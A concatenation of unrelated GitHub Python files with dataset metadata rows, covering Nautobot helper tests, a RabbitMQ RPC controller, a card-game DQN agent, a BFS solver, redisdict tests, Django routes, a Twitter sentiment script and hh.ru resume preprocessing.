self.assertEqual(result, "test")
@patch("nautobot.dcim.models.Device")
def test_render_jinja_template_success(self, mock_device):
"""Simple success test to return template."""
worker = render_jinja_template(mock_device, "logger", "fake-template-contents")
self.assertEqual(worker, "fake-template-contents")
@patch("nautobot.dcim.models.Device")
def test_render_jinja_template_success_render_context(self, mock_device):
"""Test that device object is passed to template context."""
platform = "mock_platform"
mock_device.platform = platform
rendered_template = render_jinja_template(mock_device, "logger", "{{ obj.platform }}")
self.assertEqual(rendered_template, platform)
@patch("nautobot.dcim.models.Device")
def test_render_jinja_template_success_with_filter(self, mock_device):
"""Test custom template and jinja filter are accessible."""
rendered_template = render_jinja_template(mock_device, "logger", "{{ data | return_a }}")
self.assertEqual(rendered_template, "a")
@patch("nautobot.dcim.models.Device")
def test_render_filters_work(self, mock_device):
"""Test Jinja filters are still there."""
# This has failed because of import issues in the past, see #607 for an example failure and fix.
self.assertIn("is_ip", engines["jinja"].env.filters)
self.assertIn("humanize_speed", engines["jinja"].env.filters)
rendered_template = render_jinja_template(mock_device, "logger", "{{ '10.1.1.1' | is_ip }}")
self.assertEqual(rendered_template, "True")
rendered_template = render_jinja_template(mock_device, "logger", "{{ 100000 | humanize_speed }}")
self.assertEqual(rendered_template, "100 Mbps")
@patch("nautobot_golden_config.utilities.logger.NornirLogger")
@patch("nautobot.dcim.models.Device", spec=Device)
def test_render_jinja_template_exceptions_undefined(self, mock_device, mock_nornir_logger):
"""Use fake obj key to cause UndefinedError from Jinja2 Template."""
with self.assertRaises(NornirNautobotException):
with self.assertRaises(jinja_errors.UndefinedError):
render_jinja_template(mock_device, mock_nornir_logger, "{{ obj.fake }}")
mock_nornir_logger.error.assert_called_once()
@patch("nautobot_golden_config.utilities.logger.NornirLogger")
@patch("nautobot.dcim.models.Device")
def test_render_jinja_template_exceptions_syntaxerror(self, mock_device, mock_nornir_logger):
"""Use invalid templating to cause TemplateSyntaxError from Jinja2 Template."""
with self.assertRaises(NornirNautobotException):
with self.assertRaises(jinja_errors.TemplateSyntaxError):
render_jinja_template(mock_device, mock_nornir_logger, "{{ obj.fake }")
mock_nornir_logger.error.assert_called_once()
@patch("nautobot_golden_config.utilities.logger.NornirLogger")
@patch("nautobot.dcim.models.Device")
@patch("nautobot_golden_config.utilities.helper.render_jinja2")
def test_render_jinja_template_exceptions_templateerror(self, template_mock, mock_device, mock_nornir_logger):
"""Cause issue to cause TemplateError form Jinja2 Template."""
with self.assertRaises(NornirNautobotException):
with self.assertRaises(jinja_errors.TemplateError):
template_mock.side_effect = jinja_errors.TemplateRuntimeError
render_jinja_template(mock_device, mock_nornir_logger, "template")
mock_nornir_logger.error.assert_called_once()
def test_get_backup_repository_dir_success(self):
"""Verify that we successfully look up the path from a provided repo object."""
device = Device.objects.get(name="test_device")
backup_directory = self.device_to_settings_map[device.id].backup_repository.filesystem_path
self.assertEqual(backup_directory, "/opt/nautobot/git/backup-parent_region-3")
device = Device.objects.get(name="orphan_device")
backup_directory = self.device_to_settings_map[device.id].backup_repository.filesystem_path
self.assertEqual(backup_directory, "/opt/nautobot/git/backup-parent_region-2")
def test_get_intended_repository_dir_success(self):
"""Verify that we successfully look up the path from a provided repo object."""
device = Device.objects.get(name="test_device")
intended_directory = self.device_to_settings_map[device.id].intended_repository.filesystem_path
self.assertEqual(intended_directory, "/opt/nautobot/git/intended-parent_region-3")
device = Device.objects.get(name="orphan_device")
intended_directory = self.device_to_settings_map[device.id].intended_repository.filesystem_path
self.assertEqual(intended_directory, "/opt/nautobot/git/intended-parent_region-2")
def test_get_job_filter_no_data_success(self):
"""Verify we get two devices returned when providing no data."""
result = get_job_filter()
self.assertEqual(result.count(), 2)
def test_get_job_filter_site_success(self):
"""Verify we get a single device returned when providing specific site."""
result = get_job_filter(data={"location": Location.objects.filter(name="Site 4")})
self.assertEqual(result.count(), 1)
def test_get_job_filter_device_object_success(self):
"""Verify we get a single device returned when providing single device object."""
result = get_job_filter(data={"device": Device.objects.get(name="test_device")})
self.assertEqual(result.count(), 1)
def test_get_job_filter_device_filter_success(self):
"""Verify we get a single device returned when providing single device filter."""
result = get_job_filter(data={"device": Device.objects.filter(name="test_device")})
self.assertEqual(result.count(), 1)
def test_get_job_filter_tag_success(self):
"""Verify we get a single device returned when providing tag filter that matches on device."""
result = get_job_filter(data={"tags": Tag.objects.filter(name="Orphaned")})
self.assertEqual(result.count(), 1)
def test_get_job_filter_tag_success_and_logic(self):
"""Verify we get a single device returned when providing multiple tag filter that matches on device."""
device = Device.objects.get(name="orphan_device")
device_2 = Device.objects.get(name="test_device")
content_type = ContentType.objects.get(app_label="dcim", model="device")
tag, _ = Tag.objects.get_or_create(name="second-tag")
tag.content_types.add(content_type)
device.tags.add(tag)
device_2.tags.add(tag)
# Default tag logic is an `AND` not and `OR`.
result = get_job_filter(data={"tags": Tag.objects.filter(name__in=["second-tag", "Orphaned"])})
self.assertEqual(device.tags.count(), 2)
self.assertEqual(device_2.tags.count(), 1)
self.assertEqual(result.count(), 1)
def test_get_job_filter_status_success(self):
"""Verify we get a single device returned when providing status filter that matches on device."""
result = get_job_filter(data={"status": Status.objects.filter(name="Offline")})
self.assertEqual(result.count(), 1)
def test_get_job_filter_multiple_status_success(self):
"""Verify we get a0 devices returned matching multiple status'."""
result = get_job_filter(data={"status": Status.objects.filter(name__in=["Offline", "Failed"])})
self.assertEqual(result.count(), 2)
def test_get_job_filter_base_queryset_raise(self):
"""Verify we get raise for having a base_qs with no objects due to bad Golden Config Setting scope."""
Platform.objects.create(name="Placeholder Platform")
for golden_settings in GoldenConfigSetting.objects.all():
dynamic_group = DynamicGroup.objects.create(
name=f"{golden_settings.name} group",
content_type=self.content_type,
filter={"platform": ["placeholder-platform"]},
)
golden_settings.dynamic_group = dynamic_group
golden_settings.validated_save()
with self.assertRaises(NornirNautobotException) as failure:
get_job_filter()
self.assertEqual(failure.exception.args[0][:8], "`E3015:`")
def test_get_job_filter_filtered_devices_raise(self):
"""Verify we get raise for having providing site that doesn't have any devices in scope."""
location_type = LocationType.objects.create(name="New Location Type Site")
Location.objects.create(name="New Site", status=Status.objects.get(name="Active"), location_type=location_type)
with self.assertRaises(NornirNautobotException) as failure:
get_job_filter(data={"location": Location.objects.filter(name="New Site")})
self.assertEqual(failure.exception.args[0][:8], "`E3016:`")
def test_get_job_filter_device_no_platform_raise(self):
"""Verify we get raise for not having a platform set on a device."""
device = Device.objects.get(name="test_device")
device.platform = None
device.status = Status.objects.get(name="Active")
device.validated_save()
with self.assertRaises(NornirNautobotException) as failure:
get_job_filter()
self.assertEqual(failure.exception.args[0][:8], "`E3017:`")
def test_device_to_settings_map(self):
"""Verify Golden Config Settings are properly mapped to devices."""
test_device = Device.objects.get(name="test_device")
orphan_device = Device.objects.get(name="orphan_device")
self.assertEqual(self.device_to_settings_map[test_device.id], self.test_settings_c)
self.assertEqual(self.device_to_settings_map[orphan_device.id], self.test_settings_b)
self.assertEqual(get_device_to_settings_map(queryset=Device.objects.none()), {})
| nautobot/nautobot-plugin-golden-config | nautobot_golden_config/tests/test_utilities/test_helpers.py | test_helpers.py | py | 15,315 | python | en | code | 91 | github-code | 36 | [
{
"api_name": "django.test.TestCase",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "unittest.mock.MagicMock",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "nautobot.extras.models.GitRepository.objects.all",
"line_number": 30,
"usage_type": "call"
... |
38511488026 | import json
from modules.core.log_service.log_service import Logger_Service, TRACE_LOG_LEVEL, ERROR_LOG_LEVEL
from modules.core.rabbitmq.messages.status_response import StatusResponse, ERROR_STATUS_CODE
from modules.core.rabbitmq.messages.identificators import MESSAGE_TYPE, MESSAGE_PAYLOAD
from modules.core.rabbitmq.rpc.rpc_base_handler import RpcBaseHandler
class RpcApiController:
def __init__(self, logger_service: Logger_Service):
self.logger_service = logger_service
self.handlers: {str, RpcBaseHandler} = {}
self.TAG = self.__class__.__name__
def subscribe(self, handler: RpcBaseHandler):
type = handler.message_type
if type not in self.handlers:
self.handlers[type] = handler
def received(self, message: str) -> str:
if message is None:
return self.send_response(self.generate_exception_response('Message is None'))
try:
self.logger_service.trace(self.TAG, str(message))
obj = json.loads(message)
type = obj[MESSAGE_TYPE]
payload = obj[MESSAGE_PAYLOAD]
response: StatusResponse = self.handlers[type].execute(payload)
return self.send_response(response)
except Exception as e:
error_message = f'Internal exception. \n Error: {e} \n Message: {message}'
self.logger_service.error(self.TAG, error_message)
response: StatusResponse = self.generate_exception_response(error_message)
return self.send_response(response)
def send_response(self, response: StatusResponse) -> str:
return json.dumps(response.serialize())
def generate_exception_response(self, message: str) -> StatusResponse:
return StatusResponse(message, ERROR_STATUS_CODE)
| dimterex/core_services | modules/core/rabbitmq/rpc/rcp_api_controller.py | rcp_api_controller.py | py | 1,794 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "modules.core.log_service.log_service.Logger_Service",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "modules.core.rabbitmq.rpc.rpc_base_handler.RpcBaseHandler",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "modules.core.rabbitmq.rpc.rpc_base_... |
74834158185 | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# utils
from extra.utils import trans_vector, get_cards_small_extend, calculate_score, avg_score
# config
from extra.config import original_vec, LR, MEMORY_CAPACITY, BATCH_SIZE, GAMMA
class QNet(nn.Module):
def __init__(self, ):
super(QNet, self).__init__()
self.fc1 = nn.Linear(209, 256)
self.fc1.weight.data.normal_(0, 0.1) # initialization
self.fc2 = nn.Linear(256, 128)
self.fc2.weight.data.normal_(0, 0.1) # initialization
self.fc3 = nn.Linear(128, 64)
self.fc3.weight.data.normal_(0, 0.1) # initialization
self.out = nn.Linear(64, 1)
self.out.weight.data.normal_(0, 0.1) # initialization
def forward(self, x):
x = self.fc1(x)
x = F.dropout(x, p=0.5)
x = F.relu(x)
x = self.fc2(x)
x = F.dropout(x, p=0.5)
x = F.relu(x)
x = self.fc3(x)
x = F.dropout(x, p=0.5)
x = F.relu(x)
actions_value = self.out(x)
return actions_value
class DQN(object):
def __init__(self):
# double Q-learning for TD methods setting
self.eval_net, self.target_net = QNet(), QNet()
self.device = ("cuda" if torch.cuda.is_available() else "cpu")
# if torch.cuda.device_count() > 1:
# self.eval_net = nn.DataParallel(self.eval_net, device_ids=[0, 1, 2])
# self.target_net = nn.DataParallel(self.target_net, device_ids=[0, 1, 2])
self.eval_net.to(self.device)
self.target_net.to(self.device)
self.MEMORY_CAPACITY = MEMORY_CAPACITY
self.memory_counter = 0 # for storing memory
self.memory_counter_ = 0 # for storing memory
self.memory = np.zeros((self.MEMORY_CAPACITY, 277)) # initialize memory
self.optimizer = torch.optim.Adam(self.eval_net.parameters(), lr=LR)
self.loss_func = nn.MSELoss()
self.loss_func.cuda().to(self.device)
def learn(self):
# sample batch transitions
sample_index = np.random.choice(MEMORY_CAPACITY, BATCH_SIZE)
b_memory = self.memory[sample_index, :]
b_s = torch.FloatTensor(b_memory[:, 1 + 143:1 + 143 + 66])
b_s_ = torch.FloatTensor(b_memory[:, 1 + 143 + 66:1 + 143 + 66 + 66])
b_a = torch.FloatTensor(b_memory[:, 1:1 + 143])
b_r = torch.FloatTensor(b_memory[:, -1])
input = torch.cat((b_a, b_s), 1).to(self.device)
input_ = torch.cat((b_a, b_s_), 1).to(self.device)
# double Q-learning for TD methods setting
q_eval = self.eval_net(input).squeeze() # shape (batch, 1)
q_next = self.target_net(input_).squeeze()
q_target = b_r.to(self.device) + GAMMA * q_next
loss = self.loss_func(q_eval, q_target)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
return loss.item(), q_eval.data.cpu().numpy().mean()
def choose_action(self, player, EPSILON, ways_toplay=[]):
status = player.status
if status == np.array([0]):
pattern_to_playcards = [player.current_pattern]
else:
pattern_to_playcards = player.search_pattern()
biggest_w = 0
biggest_p = 0
biggest_temp = 0
ways_list = []
lp = len(pattern_to_playcards)
for p in range(lp):
if status == np.array([1]):
ways_toplay = player.search_play_methods(pattern_to_playcards[p])
if len(ways_toplay) == 0:
return []
ways_list.append(ways_toplay)
lw = len(ways_toplay)
for w in range(lw):
action_small_extend = get_cards_small_extend(ways_toplay[w], pattern_to_playcards[p])
player_state = player.get_state()
input = np.concatenate((action_small_extend, player_state), axis=0)
input = torch.from_numpy(input).float().to(self.device)
temp = self.eval_net(input)
if temp >= biggest_temp:
biggest_w = w
biggest_p = p
biggest_temp = temp
if np.random.uniform() > EPSILON: # greedy
biggest_p = np.random.randint(0, lp)
lw = len(ways_list[biggest_p])
biggest_w = np.random.randint(0, lw)
action_cards = ways_list[biggest_p][biggest_w]
player.current_pattern = pattern_to_playcards[biggest_p]
# action_Q = biggest_temp
if type(action_cards) == int:
action_cards = [action_cards]
return action_cards
# 每次出牌结束,存储当时的局面s和出牌a, 和 ABC的位置, 每局结束时, 根据 ABC 的位置去分配奖励reward
def store_transition(self, player, action_cards, current_state):
pattern = player.current_pattern
cards_small_extend = get_cards_small_extend(action_cards, pattern)
current_position = player.position
if current_position == 'player_A':
position = 1
if current_position == 'player_B':
position = 2
if current_position == 'player_C':
position = 3
position = np.array([position])
next_state = player.get_state()
r_placeholder = np.array([0])
input = np.concatenate((position, cards_small_extend, current_state, next_state, r_placeholder), axis=0)
# replace the old memory with new memory
index = self.memory_counter % MEMORY_CAPACITY
self.memory[index, :] = input
self.memory_counter += 1
# 每局游戏结束,为训练标签添加奖励
def add_reward(self, player):
# get info from current player
winner = player.position
next_player = player.get_next_player()
next_next_player = next_player.get_next_player()
loser_one = next_player.position
loser_two = next_next_player.position
loser_one_cards = next_player.cards
loser_two_cards = next_next_player.cards
if winner == 'player_A':
winner_position = 1
elif winner == 'player_B':
winner_position = 2
elif winner == 'player_C':
winner_position = 3
if loser_one == 'player_A':
loser_one_position = 1
elif loser_one == 'player_B':
loser_one_position = 2
elif loser_one == 'player_C':
loser_one_position = 3
if loser_two == 'player_A':
loser_two_position = 1
elif loser_two == 'player_B':
loser_two_position = 2
elif loser_two == 'player_C':
loser_two_position = 3
for i in range(self.memory_counter - self.memory_counter_):
index = self.memory_counter_ % MEMORY_CAPACITY
temp = (index + i) % MEMORY_CAPACITY
# 输赢计分
loser_one_cards_small = trans_vector(loser_one_cards)
loser_two_cards_small = trans_vector(loser_two_cards)
loser_one_score = calculate_score(loser_one_cards_small)
loser_two_score = calculate_score(loser_two_cards_small)
winner_score = 0
if self.memory[temp, 0] == winner_position:
self.memory[temp, -1] = winner_score
elif self.memory[temp, 0] == loser_one_position:
self.memory[temp, -1] = loser_one_score
elif self.memory[temp, 0] == loser_two_position:
self.memory[temp, -1] = loser_two_score
self.memory_counter_ = self.memory_counter
| zawnpn/RL_RunFast | RL_framework/DQN.py | DQN.py | py | 7,819 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_nu... |
40309505708 | # 1261
from collections import deque
ARR_MAX = 10001
da = [0, 0, 1, -1]
db = [-1, 1, 0, 0]
def BFS(N, M, arr, visited):
deq = deque()
deq.append([0, 0])
visited[0][0] = 0
while(len(deq)):
fnt = deq.popleft()
ca = fnt[0]
cb = fnt[1]
# print(fnt)
for dir in range(0, 4):
na = ca + da[dir]
nb = cb + db[dir]
if na < 0 or na >= M or nb < 0 or nb >= N:
continue
if arr[na][nb] == '0' and visited[na][nb] > visited[ca][cb]:
visited[na][nb] = visited[ca][cb]
deq.append([na, nb])
if arr[na][nb] == '1' and visited[na][nb] > visited[ca][cb] + 1:
visited[na][nb] = visited[ca][cb] + 1
deq.append([na, nb])
# for i in range(0, M):
# print(visited[i])
return visited[M - 1][N - 1]
if __name__ == "__main__":
N, M = map(int, input().split())
arr = []
visited = []
for i in range(0, M):
arr.append(list(input()))
tmp = []
for j in range(0, N):
tmp.append(ARR_MAX)
visited.append(tmp)
print(BFS(N, M, arr, visited)) | gus-an/algorithm | 2020/05-3/bfs_1261.py | bfs_1261.py | py | 1,180 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 9,
"usage_type": "call"
}
] |
42285770606 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import redis
import datetime
import uuid
import collections
import unittest
from redisdict.redisdict import SimpleRedisDict, ComplexRedisDict, _config
from redisdict.exceptions import SerialisationError
from redisdict import configure
logger = logging.getLogger('redisdict')
logger.setLevel(logging.DEBUG)
class _RedisDictTestCase(unittest.TestCase):
klass = SimpleRedisDict
name = 'dct'
def setUp(self):
self.klass(self.name, {}, autoclean=True) # clean it up
def test_init_empty(self):
self.klass(self.name, {})
def test_key_not_exist(self):
cloud = self.klass(self.klass, {'name': 'Jim'})
cloud['name']
with self.assertRaises(KeyError):
cloud['age']
def test_delete(self):
pass
def test_resolve_options(self):
pass
class SimpleRedisDictCase(_RedisDictTestCase):
klass = SimpleRedisDict
def test_dict(self):
origin = {
'name': 'Jim',
'age': 5,
}
cloud = SimpleRedisDict(self.klass, origin)
for k, v in origin.items():
value_in_cloud = cloud[k]
self.assertIsInstance(value_in_cloud, str)
self.assertEqual(value_in_cloud, str(v))
def test_raise_error(self):
with self.assertRaises(SerialisationError):
self.klass(self.name, {'name': None})
def test_with_default_dict(self):
v = 'value of default dict'
dct = collections.defaultdict(lambda: v)
cloud = self.klass(self.name, dct)
self.assertEqual(cloud[str(uuid.uuid4())], v)
def test_lock(self):
cloud = self.klass(self.name, {})
with cloud.Lock():
cloud['info'] = 'blah blah'
class ComplexRedisDictCase(_RedisDictTestCase):
klass = ComplexRedisDict
def test_dict(self):
origin = {
'name': 'Jim',
'birth': datetime.date.today(),
'id': uuid.uuid4(),
'address': None,
}
cloud = self.klass(self.name, origin)
for k, v in origin.items():
self.assertEqual(v, cloud[k])
class ConfigTestCase(unittest.TestCase):
def test_configure_client(self):
client = redis.Redis()
configure(client=client)
self.assertIs(client, _config.client)
| Kxrr/redisdict | redisdict/tests/test_redis_dict.py | test_redis_dict.py | py | 2,395 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "unittest.TestCase",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "redisdict... |
25464280623 | from django.urls import path, re_path
from . import views
urlpatterns = [
path('', views.view_index, name='index'),
re_path('^conference/(?P<cslug>.*)/new$', views.view_new_event, name='new_event'),
re_path('^conference/(?P<cslug>.*)/(?P<eguid>.*)$', views.view_event, name='event'),
re_path('^conference/(?P<cslug>.*)$', views.view_conference, name='conference'),
re_path('^schedule/(?P<cslug>.*).json$', views.view_schedulejson, name='schedulejson'),
re_path('^schedule/(?P<cslug>.*).xml$', views.view_schedulexml, name='schedulexml'),
]
| voc/voctoimport | event/urls.py | urls.py | py | 565 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.urls.re_path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.urls.re_path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.re_... |
38507493376 | #Following code to authenticate with twitters API is from @llSourcell on github.
import tweepy
from textblob import TextBlob
#Use tweepy to authenticate with twitters API. Following keys have been removed
#because they are unique to my twitter profile. You can get yours at twitter.com
consumer_key = ''
consumer_secret = ''
access_token = ''
access_token_secret = ''
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
#CHALLENGE - Retrive tweets based off of users keyword and save to a CSV file
#and label each one as either 'positive' or 'negative', depending on the sentiment
#You can decide the sentiment polarity threshold yourself
#Constants used to determine if a tweet on the subject and if it
#is positive or negative.
positive = 0
subjectivity = 0.4
#Ask user for a keyword and retrive tweets.
keyword = input("Enter a keyword you want to search on twitter: ")
public_tweets = api.search(q = keyword, count = 10)
#Dictonary used to store tweets and sentiment rating
dic = {'Tweet': [], 'Sentiment Rating': []}
#Loop used to gather tweets and sentiment rating
for tweet in public_tweets:
#If the tweet is related to the keyword add it to the dictionary.
if TextBlob(tweet.text).sentiment[1] >= subjectivity:
dic['Tweet'].append(tweet.text)
#Determine if the tweet is positive or negative.
if TextBlob(tweet.text).sentiment[0] >= positive:
dic['Sentiment Rating'].append('Positive')
else:
dic['Sentiment Rating'].append('Negative')
#Write results to a CSV file.
filename = 'tweets.csv'
csv = open(filename, 'w')
columnTitles = ('Tweet, Sentiment Rating\n')
csv.write(columnTitles)
counter = 0
for tweet in dic['Tweet']:
row = tweet + ',' + dic['Sentiment Rating'][counter] + '\n'
csv.write(row)
csv.close()
| DevonWright/twitter_sentiment_analysis | twitter_sentiment_analysis.py | twitter_sentiment_analysis.py | py | 1,962 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tweepy.OAuthHandler",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "tweepy.API",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "textblob.TextBlob",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "textblob.TextBlob",
... |
10238662829 | import numpy as np
import pandas as pd #для анализа и предобработки данных
from utils.reader_config import config_reader
from models.models_collection import ModelRandomForest
from sklearn import preprocessing #предобработка
from sklearn.model_selection import train_test_split #сплитование выборки
from sklearn import metrics #метрики
# Импортируем константы из файла config
config = config_reader('config/config.json')
def education_level(arg):
"""
Function takes first three words of the argument and sort it among 4 cathegories: 'higher', 'higher_unfinished', 'secondary_professional' and 'secondary'
"""
arg.lower()
arg.split(' ', 2)[:3]
if 'Высшее' in arg:
return 'higher'
elif 'Неоконченное высшее' in arg:
return 'higher_unfinished'
elif 'Среднее специальное' in arg:
return 'secondary_professional'
elif 'Среднее образование' in arg:
return 'secondary'
else:
pd.NA
def get_gender(arg):
"""
Function get_gender takes string whch includes user's gender as the argument. The function returnes user's gender either 'm' or 'f'.
"""
arg.split(' ') # Method split() divides the sring by space
# If the string contains 'Мужчина', it returns letter 'M' else 'F'
return 'M' if 'Мужчина' in arg else 'F'
def get_age(arg):
"""
Function get_age takes third element of the argument and returns int number of user's age.
"""
# Method split() divides the sring by space, and method int() transform the number into an integer
return int(arg.split(' ')[3])
def get_experience(arg):
"""
The get_experience function takes int value of monts and/or years of user experience as the argument. It returns int value in monts.
"""
year_description = ['лет', 'года', 'год']
month_description = ['месяц','месяца', 'месяцев']
months = 0
# If user experience value is absent, return np.NaN
if arg == 'Не указано' or arg is None or arg is np.NaN:
return np.NaN
else:
arg_splitted = arg.split(' ')[:6] # Method divides the string by spaces
# If the string contains years features, it will be recalculated in months
if arg_splitted[3] in year_description:
# If the string contains months features, its value will be represented as an int number
if arg_splitted[5] in month_description:
months = int(arg_splitted[2])*12 + int(arg_splitted[4])
# If the string does not contains months features, its value will be calculated from years value
else:
months = int(arg_splitted[2])*12
# If the string does not contains year features, its value is just int months number
else:
months = int(arg_splitted[2])
return months
def get_city(arg):
"""
The get_city function return 1 of 4 cathegories of city: 1)Moscow 2)Petersburg 3)Megapolis 4)other.
The function argument is a first word of the feature 'Город, переезд, командировки'.
"""
arg = arg.split(' ') # Method divides the string by spaces
# The list of megapolis cities
million_cities = ['Новосибирск', 'Екатеринбург','Нижний Новгород','Казань', \
'Челябинск','Омск', 'Самара', 'Ростов-на-Дону', 'Уфа', 'Красноярск', \
'Пермь', 'Воронеж','Волгоград']
if arg[0] == 'Москва':
return 'Moscow'
elif arg[0] == 'Санкт-Петербург':
return 'Petersburg'
elif arg[0] in million_cities:
return 'megapolis'
else:
return 'other'
# Definition of relocation willingness
def get_relocation(arg):
"""
The get_relocation function returns relocation willingness (True/False). The function argument is the feature string 'Город, переезд, командировки'.
"""
if ('не готов к переезду' in arg) or ('не готова к переезду' in arg): # not ready
return False
elif 'хочу переехать' in arg: # ready
return True
else: return True
def get_bisiness_trips(arg):
"""
The get_bisiness_trips function retuens business trip readiness (True/False). The function argument is the feature string 'Город, переезд, командировки'.
"""
if ('командировка' in arg):
if ('не готов к командировкам' in arg) or('не готова к командировкам' in arg): # not ready
return False
else:
return True
else: # ready
return False
# Definition of currency
def get_currency_in_ISO_format(arg):
arg_splitted = arg.split(' ')[1].replace('.',"") #
# international currecy codes
currencies_in_ISO_dict = {
'грн':'UAH',
'USD':'USD',
'EUR':'EUR',
'белруб':'BYN',
'KGS':'KGS',
'сум':'UZS',
'AZN':'AZN',
'KZT':'KZT'
}
if arg_splitted == 'руб':
return 'RUB'
else:
return currencies_in_ISO_dict[arg_splitted]
def get_aggregated_status(arg1, arg2):
"""
The get_aggregated_status function group user by wilingness for business trips and by relocation.
"""
if arg1 is True and arg2 is True:
return 'ready_for_relocation_and_business_trips'
elif arg1 is False and arg2 is True:
return 'ready_for_relocation'
elif arg1 is True and arg2 is False:
return 'ready_for_business_trips'
else:
return 'not_ready'
def outliers_z_score_mod(data, feature, left=3, right=3, log_scale=False):
"""
The outliers_z_score_mod function filters values from outliers using z-method. Input:
- DataFrame;
- feature where we are looking for outliers.
- arguments 'left' and 'right' - are sigma multipliers; both are equal to 3 by default;
- when the argument log_scale is True, it scales values to logarithmic.
"""
if log_scale:
x = np.log(data[feature])
else:
x = data[feature]
mu = x.mean()
sigma = x.std()
lower_bound = mu - left * sigma
upper_bound = mu + right * sigma
outliers = data[(x < lower_bound) | (x > upper_bound)]
cleaned = data[(x > lower_bound) & (x < upper_bound)]
return outliers, cleaned
def get_profession(arg:str)->str:
"""Function for unifying of profession titles
"""
arg = arg.lower().replace("-"," ").replace("веб","web") #.split(" ")
#programmer = ['программист', 'frontend', 'web', 'разработчик']
if 'программист' in arg or 'разработчик' in arg : #or arg==('frontend разработчик' or 'веб разработчик')
return "programmer"
elif 'дизайнер' in arg:
return 'designer'
elif 'aналитик' in arg or ('системный' and 'аналитик') in arg:
return 'analyst'
elif ('главный' and 'специалист') in arg:
return 'leading specialist'
elif 'продавец' in arg:
return 'salesman'
elif ('системный' and 'администратор') in arg:
return 'sys admin'
elif 'менеджер по продажам' in arg:
return 'sales manager'
elif 'ведущий инженер' in arg:
return 'leading engineer'
elif ('руководитель' or 'менеджер' and 'проекта' or 'проектов') in arg:
return 'project manager'
elif ('начальник' or 'руководитель' or 'заведующий') in arg:
return 'unit head'
elif ('менеджер' or ('заместитель' and 'руководителя'))in arg:
return 'manager'
elif 'директор' in arg:
return 'director'
elif 'инженер' in arg:
return 'engineer'
elif 'маркетолог' in arg:
return 'marketing specialist'
elif ('техник' or 'монтажник') in arg or arg=='монтажник':
return 'technicien'
elif ('администратор' or 'administrator' or 'reception' or '') in arg:
return 'administrator'
else:
return 'other' #arg
# Define metrics
def print_metrics(y_train, y_train_predict, y_test, y_test_predict):
print('Train R^2: {:.3f}'.format(metrics.r2_score(y_train, y_train_predict)))
print('Train MAE: {:.0f} rub.'.format(metrics.mean_absolute_error(y_train, y_train_predict)))
print('Train MAPE: {:.0f} %'.format(metrics.mean_absolute_percentage_error(y_train, y_train_predict)*100))
print('\n')
print('Test R^2: {:.3f}'.format(metrics.r2_score(y_test, y_test_predict)))
print('Test MAE: {:.0f} rub.'.format(metrics.mean_absolute_error(y_test, y_test_predict)))
print('Train MAPE: {:.0f} %'.format(metrics.mean_absolute_percentage_error(y_test, y_test_predict)*100))
def get_result():
# get data
data = pd.read_csv('data/dst-3.0_16_1_hh_database.zip', sep=';')
# Apply the function to the DataFrame
data['Education'] = data['Образование и ВУЗ'].apply(education_level)
# delete the feature 'Образование и ВУЗ'
data.drop(['Образование и ВУЗ'], axis=1, inplace=True)
# Creation of a new feature 'Gender'
data['Gender'] = data['Пол, возраст'].apply(get_gender)
# Creation of a new feature 'Age'
data['Age'] = data['Пол, возраст'].apply(get_age)
# Delete original feature
data.drop(['Пол, возраст'], axis=1, inplace=True)
data["User_experience(months)"] = data['Опыт работы'].apply(get_experience)
# Deleting the original feature 'Опыт работы'
data.drop(['Опыт работы'], axis=1, inplace=True)
# City cathegorization using the function 'get_city'
data['City'] = data['Город, переезд, командировки'].apply(get_city)
# relocation willingness using the function 'get_relocation'
data['Relocation'] = data['Город, переезд, командировки'].apply(get_relocation)
data['Business_trip'] = data['Город, переезд, командировки'].apply(get_bisiness_trips)
# Delete the original feature 'Город, переезд, командировки'
data.drop(['Город, переезд, командировки'], axis=1, inplace=True)
# Features for employment type: full time, part time, project, volunteering, internship.
employment_types = ['полная занятость', 'частичная занятость', 'проектная работа', 'волонтерство', 'стажировка']
for i in employment_types:
data[i] = data['Занятость'].apply(lambda x: True if i in x else False)
data = data.rename(columns={
'полная занятость':'full_time',
'частичная занятость':'part_time',
'проектная работа':'project',
'стажировка':'internship',
'волонтерство':'volunteering'
})
# Features for schedule types: full_time, flexible, remote, daily_shifts, long_shifts.
schedule = ['полный день', 'гибкий график', 'удаленная работа', 'сменный график', 'вахтовый метод']
# Features for schedule
for j in schedule:
data[j] = data['График'].apply(lambda x: True if j in x else False)
data = data.rename(columns={
'полный день':'full_time',
'гибкий график': 'flexible',
'удаленная работа':'remote',
'сменный график': 'daily_shifts',
'вахтовый метод':'long_shifts'
})
# Delete original features
data.drop(['Занятость', 'График' ], axis=1, inplace=True)
# Change feature «Обновление резюме» format to datetime.
data['date'] = pd.to_datetime(data['Обновление резюме'], dayfirst=False).dt.date
# Creation of a new features: 'currency' and 'salary_national' (for salary expectations in national currencies)
data['currency'] = data['ЗП'].apply(get_currency_in_ISO_format)
